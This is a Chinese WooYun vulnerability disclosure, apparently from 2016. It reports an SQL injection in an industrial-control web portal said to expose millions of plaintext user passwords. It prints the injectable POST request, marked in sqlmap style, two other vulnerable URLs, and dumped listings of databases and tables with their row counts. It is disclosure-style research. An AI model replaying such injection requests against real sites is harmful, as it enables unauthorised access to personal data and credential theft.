中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

admin
admin
admin
142268
文章
117
评论
2017年3月17日02:52:01评论298 views字数 249阅读0分49秒阅读模式
摘要

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-28: 细节向核心白帽子及相关领域专家公开
2016-04-07: 细节向普通白帽子公开
2016-04-17: 细节向实习白帽子公开
2016-05-02: 细节向公众公开

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2016-184767

漏洞标题: 中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

相关厂商: 中国工控网

漏洞作者: 小菜果子

提交时间: 2016-03-15 13:40

公开时间: 2016-05-02 18:22

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: asp+sqlserver注射

1人收藏

漏洞详情

披露状态:

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-28: 细节向核心白帽子及相关领域专家公开
2016-04-07: 细节向普通白帽子公开
2016-04-17: 细节向实习白帽子公开
2016-05-02: 细节向公众公开

简要描述:

中国工控网好火,这次和前人找的角度不一样,但同样的感觉,求首页,求20rank

详细说明:

code 区域 
POST /customer/advantech/sq11.asp HTTP/1.1
 Content-Length: 228
 Content-Type: application/x-www-form-urlencoded
 Cookie: ASPSESSIONIDCCBADTDC=HCILKDPCFHHGOOAMFMDHCEDN
 Host: **.**.**.**
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*
 
 psw=1&select=%b0%e5%bf%a8%c0%e0OEM/ODM%b7%fe%ce%f1&tijiao=%cc%e1%bd%bb&usname=aaaa*&xq=1
code 区域 
http://**.**.**.**/customer/advantech/embed.asp?key=SOM
code 区域 
http://**.**.**.**/customer/advantech/download.asp?keyword=%E5%B7%A5%E6%8E%A7%E6%9C%BA
code 区域 
available databases [51]:
 [*] ABB
 [*] agongkong
 [*] ase_050124
 [*] caa
 [*] cfpmia
 [*] cus_2010_for_bb
 [*] cus_abb
 [*] cus_abb_BC
 [*] custom
 [*] custom_1
 [*] forzdao
 [*] GkCrm
 [*] gkmall
 [*] gknetdatanew
 [*] gkoa
 [*] gkreguser
 [*] gkstat
 [*] GkStudy
 [*] gkstudynet
 [*] gksystem
 [*] gongkong
 [*] gongkongcorp
 [*] GongKongNet
 [*] inquire
 [*] kpi2012
 [*] LouKong
 [*] master
 [*] model
 [*] msdb
 [*] NBBS
 [*] NDic
 [*] NMessage
 [*] NReguser
 [*] NRegUserDynamic
 [*] NSys
 [*] NSysLog
 [*] nweblog
 [*] opc_2009
 [*] peCms
 [*] Photography
 [*] ReportServer
 [*] ReportServerTempDB
 [*] SchneiderBBS
 [*] siemensEl
 [*] siemensQuiz
 [*] tempdb
 [*] wap2011
 [*] wapsubscribe
 [*] xiugongkong
 [*] xuegongkong
 [*] youjiang
code 区域 
Database: gongkongnet
 +----------------------------------------+---------+
 | Table                                  | Entries |
 +----------------------------------------+---------+
 | dbo.WVisit                             | 30162070 |
 | dbo.RecordIP                           | 17396251 |
 | dbo.InfoPublicationLog                 | 15455349 |
 | dbo.BaseProductModelParameter          | 9287436 |
 | dbo.MPRuleHistory                      | 4584307 |
 | dbo.DownloadDetail                     | 3835223 |
 | dbo.RegUserView                        | 3353115 |
 | dbo._temp_Stock4Custom_all             | 3112420 |
 | dbo.ForumReplyUserView                 | 2865331 |
 | dbo.BADViewHistory                     | 2697192 |
 | dbo.Message                            | 2593563 |
 | dbo.CoAdAssoViewHistory                | 2508874 |
 | dbo.special_magazine_info_access       | 2180205 |
 | dbo.RegUserMemberInfo                  | 2104125 |
 | dbo.regusermemberinfoPointValueYearBak | 2089084 |
 | dbo.RegUserPointvalue                  | 1780304 |
 | dbo.UserHistory                        | 1289783 |
 | dbo.CommonAuditTrace                   | 1233675 |
 | dbo.MPExchangeDetail                   | 1134628 |
 | dbo.SearchKeyWords                     | 1044812 |
 | dbo.tb_index                           | 1042079 |
 | dbo.MmsOrder                           | 928286  |
 | dbo.smsOrder                           | 927693  |
 | dbo.V_Product_IndustryTech             | 878915  |
 | dbo.ProductIndustry                    | 878635  |
 | dbo.RegUserActivation                  | 782068  |
 | dbo.BizTrades                          | 741197  |
 | dbo.HrPositionCompanyProductView       | 679729  |
 | dbo.CompanyAsso                        | 670801  |
 | dbo.BizTradeProductTypeBrandView       | 581081  |
 | dbo.QuestVote                          | 565218  |
 | dbo.temp_index                         | 510302  |
 | dbo.ViewForumTopicPink                 | 488790  |
 | dbo.ForumTopicsByGategory              | 488768  |
 | dbo._temp_ProductModel4Custom_all      | 475602  |
 | dbo.v_Forum_List                       | 464263  |
 | dbo.CommonFeedback                     | 443200  |
 | dbo.BizSaleSelectedModel               | 433615  |
 | dbo.ViewBizSaleModel                   | 428988  |
 | dbo.IpDataBase                         | 417423  |
 | dbo.CommonFeedBackUserView             | 405108  |
 | dbo.IpAddress                          | 357178  |
 | dbo.TempIndustryProducts               | 347001  |
 | dbo.ViewTmpBbs                         | 342218  |
 | dbo.ComContMutuality                   | 330367  |
 | dbo.OnlineProsemQuestion               | 308889  |
 | dbo.HrReceiptResume                    | 265450  |
 | dbo.ViewHrPositionResume               | 265450  |
 | dbo.ViewHrUserResume                   | 265450  |
 | dbo.BaseProductModel                   | 260903  |
 | dbo.BaseProductModelView               | 260903  |
 | dbo.HomeUserClickRecord                | 253864  |
 | dbo.BaseProductModel3                  | 248096  |
 | dbo.Photo                              | 244569  |
 | dbo.ProductsByIProductTypeViews        | 241597  |
 | dbo.BaseIProductTypeProductViews       | 241006  |
 | dbo.CompanyProductTypeIdView           | 211556  |
 | dbo.ViewNewsSolutionDatumTutorial      | 196842  |
 | dbo.RegUserVisitHistory                | 196126  |
 | dbo.IndustryChannelIndustryNewsView    | 191583  |
 | dbo.TempIndustryCompany                | 190784  |
 | dbo._bak4City                          | 182714  |
 | dbo.TechArticleIndustry                | 178308  |
 | dbo._bak4Category                      | 176725  |
 | dbo.ViewTechArticleIndustry            | 176646  |
 | dbo.RegUserFavorite                    | 174096  |
 | dbo._bak4Intent                        | 163031  |
 | dbo.BizSalesProdutType                 | 162029  |
 | dbo.ProductProductType                 | 161109  |
 | dbo.ProductsByProductTypeView          | 159652  |
 | dbo.V_TechArticle_IndustryTech         | 158801  |
 | dbo.ViewProductsByMinPcode             | 157910  |
 | dbo.ViewProductsByMin                  | 156775  |
 | dbo.ViewProductsByMidPcode             | 156452  |
 | dbo.V_Product_PRunPType                | 156202  |
 | dbo.ViewProductsByMid                  | 155317  |
 | dbo.V_BizSales_PRunPType               | 152804  |
 | dbo.OnlineLogins                       | 149393  |
 | dbo.WInfo                              | 145529  |
 | dbo.CommonFeedbackStat                 | 144611  |
 | dbo.CompanyProductyType                | 143719  |
 | dbo.ViewCompanyIDByMinPcode            | 141632  |
 | dbo.ViewCompanysByMinPcode             | 141603  |
 | dbo.ViewCompanyIDByMidPcode            | 140665  |
 | dbo.ViewCompanysByMidPcode             | 140636  |
 | dbo.RegUserFriend                      | 138368  |
 | dbo.V_Company_PRunPType                | 137827  |
 | dbo.ViewCompanyCtypePtype              | 137777  |
 | dbo.NewsProductType                    | 137251  |
 | dbo.V_News_PRunPType                   | 136735  |
 | dbo.V_News_IndustryTech                | 135954  |
 | dbo.NewsIndustry                       | 134103  |
 | dbo.ViewHYTJNews                       | 134103  |
 | dbo._temp_Price4Custom_all             | 133644  |
 | dbo.BaseProductModel2                  | 132815  |
 | dbo.SlcStatic                          | 130849  |
 | dbo.V_Datum_PRunPType                  | 124490  |
 | dbo.DatumProdutType                    | 124300  |
 | dbo.DatumProductTypeView               | 124298  |
 | dbo.CompanyMenu                        | 123661  |
 | dbo.ViewTechnicCommend                 | 120461  |
 | dbo.NewsByProductTypeView              | 116402  |
 | dbo.ViewNewsByPtype                    | 115990  |
 | dbo.ViewNewsIdByPtype                  | 115990  |
 | dbo.DatumFreeReguser                   | 111432  |
 | dbo.RegUserGroupMember                 | 110873  |
 | dbo.researchVisit                      | 108867  |
 | dbo.HrUserBase                         | 107650  |
 | dbo.ViewHrUserInfo                     | 107650  |
 | dbo.V_TechArticle_PRunPType            | 106176  |
 | dbo.TechArticleProductType             | 104950  |
 | dbo.ViewDatumByPtype                   | 104404  |
 | dbo.ViewDatumIdByPtype                 | 104404  |
 | dbo.HrUserIntent                       | 103745  |
 | dbo.ViewProductByMaxPtype              | 103416  |
 | dbo.ViewProductIdByMaxPtype            | 103416  |
 | dbo.BizSalesProductTypeView            | 101703  |
 | dbo.V_Datum_IndustryTech               | 101558  |
 | dbo.ViewProductsByMaxPcode             | 101465  |
 | dbo.DatumIndustry                      | 100880  |
 | dbo.ViewProductsByMax                  | 100608  |
 | dbo.ViewCompanyIDByMaxPcode            | 99994   |
 | dbo.ViewCompanysByMaxPcode             | 99979   |
 | dbo.RegUserIndustry                    | 96509   |
 | dbo.News                               | 93034   |
 | dbo.ViewCompanyIdByPtype               | 91908   |
 | dbo.ViewCompanyByPtype                 | 91895   |
 | dbo.ViewSaleModel                      | 91152   |
 | dbo.Product                            | 89566   |
 | dbo.ProductProductCustomType           | 88075   |
 | dbo.OnlineProsemAnswer                 | 86608   |
 | dbo.BizSaleProductTypeView             | 85618   |
 | dbo.ForumTopic3                        | 84601   |
 | dbo.HrUserWorklive                     | 84540   |
 | dbo.ProseminarRecord                   | 84513   |
 | dbo.BizSales                           | 84155   |
 | dbo.PaperIndustry                      | 83813   |
 | dbo.PaperIndustryView                  | 83812   |
 | dbo.Datum                              | 83586   |
 | dbo.RegUserProductType                 | 82045   |
 | dbo.HrEducation                        | 81966   |
 | dbo.BlogIndexAction                    | 81697   |
 | dbo.testProductView                    | 79542   |
 | dbo.BizSaleProductBrandView            | 77788   |
 | dbo.BizResortProductType               | 75075   |
 | dbo.V_MarketNews_IndustryTech          | 74170   |
 | dbo.MarketNewsIndustry                 | 74013   |
 | dbo.MarketNewsIndustryView             | 74008   |
 | dbo.px_paperIndustry                   | 73520   |
 | dbo.ViewHYTJPapar                      | 73520   |
 | dbo.HrUserLanguage                     | 72405   |
 | dbo.CompanySeller                      | 68872   |
 | dbo.ForumTopicsBySortView              | 65898   |
 | dbo.ViewHYTJBBS                        | 65842   |
 | dbo.WapMobileHistory                   | 64675   |
 | dbo.BizResortProductTypeView           | 64416   |
 | dbo.HrPositionProductType              | 63260   |
 | dbo.TechArticle                        | 62284   |
 | dbo.ArticeAssoProductType              | 60433   |
 | dbo.ProductIdByBrandView               | 56743   |
 | dbo.BizResortStock                     | 56473   |
 | dbo.CompanyCompanyType                 | 54386   |
 | dbo.CompanyCompanyTypeView             | 54373   |
 | dbo.ViewCompanyCompanyType             | 54373   |
 | dbo.StatFileLog                        | 52674   |
 | dbo.MarketNews                         | 52494   |
 | dbo.Company                            | 52433   |
 | dbo._bak4work                          | 51607   |
 | dbo.SolutionIndustry                   | 50495   |
 | dbo.ViewHYTJSolution                   | 50177   |
 | dbo.ViewSolutionIndustry               | 50177   |
 | dbo.BizOrderDetails                    | 48130   |
 | dbo.ViewOrderModel                     | 48130   |
 | dbo.BizOrder                           | 48108   |
 | dbo.TempConvert                        | 45761   |
 | dbo.MediaUserSubscibe                  | 45506   |
 | dbo.CompanyIndustry                    | 44062   |
 | dbo.QuestUserAnswer                    | 43808   |
 | dbo.DatumBrandView                     | 42660   |
 | dbo.TempIproductType                   | 41655   |
 | dbo.PhotoPhotoContest                  | 40049   |
 | dbo.PaperProductType                   | 39379   |
 | dbo.ModelParameter                     | 39142   |
 | dbo.ChargeInfo                         | 38088   |
 | dbo.ProductModel                       | 37800   |
 | dbo.PhotoContest                       | 34157   |
 | dbo.ArticeAssoIndustry                 | 33757   |
 | dbo.SysLog                             | 33752   |
 | dbo.InfoCommendStat                    | 33686   |
 | dbo.AdvertiseProductType               | 32426   |
 | dbo.MPExcuteTemp                       | 30724   |
 | dbo.SchneiderUser                      | 30475   |
 | dbo.BaseSeriesProductType              | 29418   |
 | dbo.model_bak                          | 28206   |
 | dbo.ReserReguser                       | 27795   |
 | dbo.SolutionProductType                | 27416   |
 | dbo.OnlineProseminarVideoPPt           | 27050   |
 | dbo.CompanysByAccountTypeView          | 27004   |
 | dbo.CommonVote                         | 26978   |
 | dbo.CompanyLayout                      | 26476   |
 | dbo.HrTrainExp                         | 26226   |
 | dbo.PayReadHistory                     | 25225   |
 | dbo.Papers                             | 24899   |
 | dbo.ViewSolutionIdByPtype              | 24657   |
 | dbo.ViewSolutionByPtype                | 24523   |
 | dbo.ViewHrPositionCompany              | 24488   |
 | dbo.SchneiderUserSolution              | 24486   |
 | dbo.BaseParamConst                     | 24331   |
 | dbo.RegUserBrand                       | 23126   |
 | dbo._bak4PCategory                     | 21600   |
 | dbo.CompanyStockServer                 | 20430   |
 | dbo._temp_Stock4Custom                 | 20367   |
 | dbo.ClumMember                         | 20156   |
 | dbo.ViewClubMemberRegUser              | 20154   |
 | dbo.ViewClubMemberSelect               | 20154   |
 | dbo.OnlineLogout                       | 19917   |
 | dbo.Solutions                          | 19078   |
 | dbo.HrPosition                         | 18893   |
 | dbo.DatumProductSeries                 | 18197   |
 | dbo.HrUserBaseBrand                    | 18152   |
 | dbo.BookOrderDetails                   | 17964   |
 | dbo.NewsProductCustomType              | 17598   |
 | dbo.KouBei                             | 17170   |
 | dbo.MPShareHistory                     | 17057   |
 | dbo.CompanyBrand                       | 16801   |
 | dbo.ViewHrPositions                    | 15549   |
 | dbo.ProductCustomType                  | 15370   |
 | dbo.ExpositionLook                     | 15075   |
 | dbo.CompanyBrandView                   | 14692   |
 | dbo.BaseProductSeries                  | 14520   |
 | dbo.ViewPaperIdByPtype                 | 14355   |
 | dbo.ViewPaperByPtype                   | 14328   |
 | dbo.papers_importdata                  | 13212   |
 | dbo.ExpositionDetails                  | 13165   |
 | dbo.BizTradesProductSeries             | 13157   |
 | dbo.BookOrder                          | 12935   |
 | dbo.InfoProject                        | 12918   |
 | dbo.ExpositionDetailsView              | 12620   |
 | dbo.PhotoTypeCustomer                  | 12529   |
 | dbo.gongkongcompany                    | 12089   |
 | dbo.FaultCode                          | 12005   |
 | dbo.FaultCode2                         | 12005   |
 | dbo.ProseminarProductType              | 11869   |
 | dbo.ProseminarProductTypeView          | 11860   |
 | dbo.SolutionByIProductTypeView         | 11758   |
 | dbo.Repair                             | 11752   |
 | dbo.TechArticleProductSeries           | 11658   |
 | dbo.ProductMutuality                   | 11328   |
 | dbo.ProseminarProductTypeBrandView     | 10932   |
 | dbo.GkgcLog                            | 10797   |
 | dbo.Test_PhotoPhotoContest             | 10681   |
 | dbo.RegUserFriendType                  | 10674   |
 | dbo.BaseBrandProductTypeGK             | 10619   |
 | dbo.InquireRecordUsers                 | 10537   |
 | dbo.HrUserBaseAssoCompany              | 10361   |
 | dbo.QuestOption                        | 10259   |
 | dbo.ViewHrUserInfoDown                 | 10144   |
 | dbo.TempIndustrySolutions              | 9218    |
 | dbo.BizResortStockProductSeries        | 9051    |
 | dbo.BaseParameterType                  | 8710    |
 | dbo.BaseParameter                      | 8160    |
 | dbo.webLink                            | 7970    |
 | dbo.ProjectDocument                    | 7937    |
 | dbo.ProductModelParameter              | 7346    |
 | dbo.ArticleIndustry                    | 6589    |
 | dbo.ActUser                            | 6585    |
 | dbo.BPrivilegeBControl                 | 6522    |
 | dbo.ViewCompanyMemberType              | 6511    |
 | dbo.ActUserRole                        | 6447    |
 | dbo.ViewMemberCompany                  | 6253    |
 | dbo.ArticeAssoBrand                    | 5981    |
 | dbo.ViewCompanysAssoUser               | 5860    |
 | dbo.ViewCompnayIDAssoUser              | 5860    |
 | dbo.BControl                           | 5730    |
 | dbo.IndustryChannelMKResearchView      | 5262    |
 | dbo.ResearchIndustry                   | 5118    |
 | dbo.Proseminar                         | 5117    |
 | dbo.CommonChannelCommend               | 5084    |
 | dbo.MPExchange                         | 5078    |
 | dbo.BPrivilegeBPage                    | 5065    |
 | dbo.ReportError                        | 5059    |
 | dbo.ViewCompanyMember                  | 5058    |
 | dbo.CommunityVisit                     | 5045    |
 | dbo.xp_user                            | 4987    |
 | dbo.ResearchNewsIndexAction            | 4976    |
 | dbo.CommendProductPtypeView            | 4741    |
 | dbo.TutorialIndustry                   | 4659    |
 | dbo.NewsProductSeries                  | 4542    |
 | dbo.HrProjectExp                       | 4376    |
 | dbo.BTag                               | 4373    |
 | dbo.ArticleProductType                 | 4283    |
 | dbo.DatumDatumCustomerType             | 4185    |
 | dbo.HrUserIndexAction                  | 4076    |
 | dbo.MpHistoryMpExchange                | 4054    |
 | dbo.HrSpecialSkill                     | 3968    |
 | dbo.DerlingCeaiHistory                 | 3926    |
 | dbo.BaseParameterTmp                   | 3870    |
 | dbo.MediaUserContribute                | 3839    |
 | dbo.BADVisitHistory                    | 3771    |
 | dbo.ParameterOption                    | 3599    |
 | dbo.BRoleBPrivilege                    | 3568    |
 | dbo.yeneihezuo_user                    | 3450    |
 | dbo.BPrivilege                         | 3367    |
 | dbo.MyCardCase                         | 3344    |
 | dbo.TutorialDetails                    | 3339    |
 | dbo.RegUserIntel                       | 3199    |
 | dbo.OAFeedback                         | 3164    |
 | dbo.CommendProductPcode                | 3157    |
 | dbo.BrandAssoProduct                   | 3120    |
 | dbo.Advertise                          | 3110    |
 | dbo.InfoPublication                    | 3104    |
 | dbo.BaseBrandProductTypeXiu2           | 3062    |
 | dbo.Question                           | 2913    |
 | dbo.english_news                       | 2901    |
 | dbo.HrUserResumeAccessory              | 2864    |
 | dbo.VideoTypeCustomer                  | 2738    |
 | dbo.lunwen_user                        | 2682    |
 | dbo.BaseBrandProductType               | 2679    |
 | dbo.TechArticleProductionRun           | 2656    |
 | dbo.ViewHwwzIndustry                   | 2643    |
 | dbo.View_HwwzBaseIndustry              | 2617    |
 | dbo.HrCompanyFavorite                  | 2514    |
 | dbo.exam_user                          | 2498    |
 | dbo.BaseBrandProductTypeView           | 2409    |
 | dbo.CommendProductView                 | 2357    |
 | dbo.CompanyStockServerSub              | 2349    |
 | dbo.videoCode                          | 2314    |
 | dbo.OnlineSurveryHistory               | 2313    |
 | dbo.news_user                          | 2287    |
 | dbo.BaseBrandProductTypeXiu            | 2238    |
 | dbo.UserContributions                  | 2222    |
 | dbo.SendMMsHistory                     | 2154    |
 | dbo.Article                            | 2148    |
 | dbo.OnlineProsemUser                   | 2130    |
 | dbo.AdSubjectContent                   | 2123    |
 | dbo.MediaPaper                         | 2102    |
 | dbo.TutorialProductType                | 2023    |
 | dbo.ContentScoreDetails                | 2021    |
 | dbo.MpCashExchange                     | 1989    |
 | dbo.NewsTechType                       | 1977    |
 | dbo.bz_user                            | 1972    |
 | dbo.BPage                              | 1964    |
 | dbo.ActUserHr                          | 1943    |
 | dbo.HrManageExp                        | 1892    |
 | dbo.CustomServicers                    | 1886    |
 | dbo.CustomServicersView                | 1886    |
 | dbo.BookHistory                        | 1861    |
 | dbo.AdvertiseSiteColumnPageArea        | 1829    |
 | dbo.BaseBrand                          | 1817    |
 | dbo.CoAdAssoHitHistory                 | 1811    |
 | dbo.CommonAccessTrace                  | 1790    |
 | dbo.ActPermissionResource              | 1765    |
 | dbo.V_MarketNews_PRunPType             | 1757    |
 | dbo.jszc_user                          | 1746    |
 | dbo.BizCooperateProductType            | 1729    |
 | dbo.BizCooperateProductTypeBrandView   | 1729    |
 | dbo.KeyWordFilter                      | 1710    |
 | dbo.OAMessage                          | 1675    |
 | dbo.ProductProductionRun               | 1671    |
 | dbo.CompanyEmployees                   | 1608    |
 | dbo.pxblog_user                        | 1607    |
 | dbo.BizMro                             | 1576    |
 | dbo.WapMobibleUserInfo                 | 1562    |
 | dbo.BookInAndOut                       | 1548    |
 | dbo.InfoMemberAttemp                   | 1533    |
 | dbo.OAGiftHistory                      | 1510    |
 | dbo.ViewAdRoleCompanys                 | 1495    |
 | dbo.ResearchProductType                | 1487    |
 | dbo.RepairAccessory                    | 1401    |
 | dbo.BaseExcel                          | 1366    |
 | dbo.Books                              | 1336    |
 | dbo.DatumProductionRun                 | 1328    |
 | dbo.MarketNewsProductType              | 1322    |
 | dbo.MarketNewsProductTypeViews         | 1322    |
 | dbo.Exposition                         | 1284    |
 | dbo.newuserEnglish                     | 1201    |
 | dbo.SolicitarticleFeedback             | 1189    |
 | dbo.TutorialDir                        | 1144    |
 | dbo.HRSurvey                           | 1059    |
 | dbo.solutionProductCustomType          | 1041    |
 | dbo.OnlineProsemSurvey                 | 1035    |
 | dbo.VideoVideoType                     | 1008    |
 | dbo.Video                              | 1000    |
 | dbo.BaseIProductTypeAssc               | 988     |
 | dbo.BaseIProductTypeViews              | 988     |
 | dbo.OnlineProsemIndustry               | 945     |
 | dbo.BookGathering                      | 941     |
 | dbo.VideoFeedback                      | 912     |
 | dbo.MediaNews                          | 900     |
 | dbo.EquipmentPurchase                  | 885     |
 | dbo.CompanyContact                     | 883     |
 | dbo.CompanyFocus                       | 874     |
 | dbo.Attestation                        | 867     |
 | dbo.datumimportdata                    | 841     |
 | dbo.ExcelUploadFiles                   | 838     |
 | dbo.BaseProductType                    | 835     |
 | dbo.ViewProductType                    | 835     |
 | dbo.BookProductType                    | 825     |
 | dbo.ViewAdCompanys                     | 823     |
 | dbo.VideoIndustry                      | 795     |
 | dbo.ViewXlsCompanySaleModel            | 792     |
 | dbo.CompanyMember                      | 780     |
 | dbo.MediaCatalog                       | 768     |
 | dbo.TechArticleTechType                | 765     |
 | dbo.FactoryCompanyIndustry             | 733     |
 | dbo.IRegUserConfig                     | 717     |
 | dbo.AskerOline                         | 702     |
 | dbo.OnlineProsemProductType            | 686     |
 | dbo.BaseProductType_Temp               | 681     |
 | dbo.CompanyCommend                     | 678     |
 | dbo.DatumTechType                      | 678     |
 | dbo.RegUserAccountInfo                 | 651     |
 | dbo.CompanyPartSettings                | 650     |
 | dbo.ViewResearchNewsRpt                | 633     |
 | dbo.BizCooperate                       | 632     |
 | dbo.ForumPurviewView                   | 631     |
 | dbo.MemberPurview                      | 631     |
 | dbo.GKCreditApp                        | 629     |
 | dbo.ResearchReport                     | 621     |
 | dbo.px_2008_list                       | 583     |
 | dbo.Questionnaire                      | 578     |
 | dbo.NewsProductionRun                  | 572     |
 | dbo.VideoProductType                   | 570     |
 | dbo.AdvBooking                         | 531     |
 | dbo.ForumGategory_Temp                 | 531     |
 | dbo.CompanyBanner                      | 530     |
 | dbo.ProductDocumentProductType         | 530     |
 | dbo.ProjectDocumentProductType         | 528     |
 | dbo.ActControlResource                 | 514     |
 | dbo.RegUserExtend                      | 501     |
 | dbo.ElementDynamic                     | 500     |
 | dbo.BaseProductType_Bak                | 498     |
 | dbo.datumTypeCustomer                  | 494     |
 | dbo.SolicitArticlesProductType         | 488     |
 | dbo.OnlineProseminar                   | 486     |
 | dbo.Cases                              | 483     |
 | dbo.OnlineProsemCompany                | 483     |
 | dbo.InfoCommend                        | 477     |
 | dbo.MarketNewsProductionRun            | 472     |
 | dbo.CompanyLink                        | 458     |
 | dbo.ExpositionCompany                  | 450     |
 | dbo.BMenu                              | 447     |
 | dbo.BPrivilegeBMenu                    | 447     |
 | dbo.BaseBrandProductTypeXiu1           | 436     |
 | dbo.IRegUserMessage                    | 436     |
 | dbo.exam_list                          | 431     |
 | dbo.OnlineProseminarMPHistory          | 431     |
 | dbo.BaseArea                           | 429     |
 | dbo.PhotoWinPrize                      | 424     |
 | dbo.lunwen_list                        | 420     |
 | dbo.AdvertiseApply                     | 405     |
 | dbo.BaseProductTypeXiu                 | 381     |
 | dbo.TempIproductTypePtype              | 378     |
 | dbo.MemberAdmin                        | 376     |
 | dbo.FactoryCompany                     | 359     |
 | dbo.ProductAheadNote                   | 359     |
 | dbo.HrInterviewingInform               | 349     |
 | dbo.MPRuleHistoryTemp                  | 341     |
 | dbo.CompanyProductionRun               | 335     |
 | dbo.RegUserCommunityInfo               | 332     |
 | dbo.ViewHwwzPcode                      | 323     |
 | dbo.HrManagerNewsFeedback              | 321     |
 | dbo.CommunityUser                      | 309     |
 | dbo.Product_Del                        | 300     |
 | dbo.GongkongMP10                       | 296     |
 | dbo.news_en                            | 286     |
 | dbo.ProductDocument                    | 284     |
 | dbo.BaseIndustry                       | 280     |
 | dbo.ProductTechType                    | 280     |
 | dbo.ActUserExpo                        | 276     |
 | dbo.RegUserAppCom                      | 262     |
 | dbo.BAreaAdvertiseAsso                 | 252     |
 | dbo.HrNews                             | 252     |
 | dbo.AbroadArticleView                  | 248     |
 | dbo.SendHistory                        | 248     |
 | dbo.FactoryCompanyType                 | 247     |
 | dbo.CompanySpecial                     | 238     |
 | dbo.MPRule                             | 238     |
 | dbo.ProseminarTechType                 | 238     |
 | dbo.HrSubscibe                         | 236     |
 | dbo.ExpositionJoin                     | 234     |
 | dbo.GongKongNewsView                   | 232     |
 | dbo.ActUserBRole                       | 227     |
 | dbo.OAGiftPicture                      | 216     |
 | dbo.english_weekly                     | 215     |
 | dbo.BookAmount                         | 213     |
 | dbo.CompanyCustomize                   | 213     |
 | dbo.SolicitarticleComeView             | 210     |
 | dbo.SolicitArticles                    | 210     |
 | dbo.MarketNewsTechType                 | 204     |
 | dbo.OAGift                             | 187     |
 | dbo.HrHunterPositionView               | 181     |
 | dbo.NewsAssoSocial                     | 181     |
 | dbo.BizSalesProductionRun              | 174     |
 | dbo.ClubPayment                        | 174     |
 | dbo.IRegUserFavorite                   | 174     |
 | dbo.ViewClubPaymentUser                | 174     |
 | dbo.BaseProductTypeProductTypeXiu      | 172     |
 | dbo.BaseIProductType                   | 156     |
 | dbo.FactoryCompanyProductyType         | 156     |
 | dbo.xp_list                            | 156     |
 | dbo.DerlingCeai                        | 143     |
 | dbo.CoSiteCoHotMessage                 | 140     |
 | dbo.BAdvertise                         | 134     |
 | dbo.ResearchNews                       | 132     |
 | dbo.CoAdAsso                           | 130     |
 | dbo.BookOosNote                        | 125     |
 | dbo.CommonSubject                      | 125     |
 | dbo.MmsMessage                         | 119     |
 | dbo.RegUserGroup                       | 118     |
 | dbo.BArea                              | 116     |
 | dbo.FaultCodeBack                      | 115     |
 | dbo.CasesIndustry                      | 114     |
 | dbo.CompanyPublication                 | 109     |
 | dbo.jszc_list                          | 106     |
 | dbo.WapMobileCompany                   | 105     |
 | dbo.yanjiu                             | 103     |
 | dbo.HrUserAssoActivity                 | 102     |
 | dbo.ResearchMessage                    | 100     |
 | dbo.ViewOnlieProsemCompany             | 98      |
 | dbo.hrManagerNews                      | 94      |
 | dbo.PayOrder                           | 90      |
 | dbo.BColumnMPRule                      | 89      |
 | dbo.WComment                           | 89      |
 | dbo.BEmployee                          | 87      |
 | dbo.BaseCompanyTypeUserJob             | 86      |
 | dbo.InfoProjectIndustry                | 86      |
 | dbo.MediaBase                          | 83      |
 | dbo.InteractiveCommendView             | 82      |
 | dbo.ResearchVisitUser                  | 82      |
 | dbo.ActUserMedia                       | 81      |
 | dbo.ActRole                            | 78      |
 | dbo.NewsHr                             | 76      |
 | dbo.HrPositionType                     | 75      |
 | dbo.OAServiceHistory                   | 74      |
 | dbo.MpGiftHistory                      | 73      |
 | dbo.ViewDynamicResearch                | 72      |
 | dbo.DatumFreeReguserHistory            | 71      |
 | dbo.News_Del                           | 71      |
 | dbo.MRReportTypeMRCustomer             | 70      |
 | dbo.SolutionTechType                   | 70      |
 | dbo.ClubMessage                        | 68      |
 | dbo.OnlineSurveryItem                  | 67      |
 | dbo.ClubMessageTypeView                | 66      |
 | dbo.HRBranches                         | 66      |
 | dbo.MediaUserAdRequest                 | 64      |
 | dbo.tempTopic                          | 63      |
 | dbo.SendMsgTable                       | 60      |
 | dbo.QuestionnairesBody                 | 59      |
 | dbo.QuestionnairesHead                 | 59      |
 | dbo.CompetencyBrand                    | 55      |
 | dbo.PaperTechType                      | 55      |
 | dbo.ViewCompanyCompetencyBrand         | 55      |
 | dbo.RegUserGroupIndustry               | 52      |
 | dbo.CommunityMessage                   | 51      |
 | dbo.ProductProductParameter            | 51      |
 | dbo.Community                          | 50      |
 | dbo.onlineQTemp                        | 49      |
 | dbo.BizCooperateIndustry               | 48      |
 | dbo.ChannelsServer                     | 48      |
 | dbo.CustomServicer                     | 48      |
 | dbo.ErrorTable                         | 48      |
 | dbo.IRegUserMessageFeedBack            | 46      |
 | dbo.MPProject                          | 46      |
 | dbo.ViewRoleResource                   | 46      |
 | dbo.CompanyLinkman                     | 45      |
 | dbo.CommonSubjectPrd                   | 44      |
 | dbo.dst2q                              | 44      |
 | dbo.bz_list                            | 42      |
 | dbo.NonRegUser                         | 42      |
 | dbo.IMessageConfig                     | 41      |
 | dbo.yeneihezuo_en                      | 41      |
 | dbo.CoSite                             | 40      |
 | dbo.ProseminarLogins                   | 40      |
 | dbo.SubMpScoreTable                    | 40      |
 | dbo.InfoProjectProductType             | 39      |
 | dbo.OpSqlNote                          | 38      |
 | dbo.StockCompany                       | 38      |
 | dbo.Lecturer                           | 37      |
 | dbo.OAMessageType                      | 37      |
 | dbo.DatumProdutType_Del                | 36      |
 | dbo.BaseEmail                          | 34      |
 | dbo.RegUserGroupProductType            | 32      |
 | dbo.BaseTechType                       | 30      |
 | dbo.TVFeedback                         | 30      |
 | dbo.UserJoinTag                        | 29      |
 | dbo.CompanyComHit                      | 28      |
 | dbo.HrProductType                      | 27      |
 | dbo.ProseminarOline                    | 27      |
 | dbo.UserHelp                           | 27      |
 | dbo.MRReport                           | 26      |
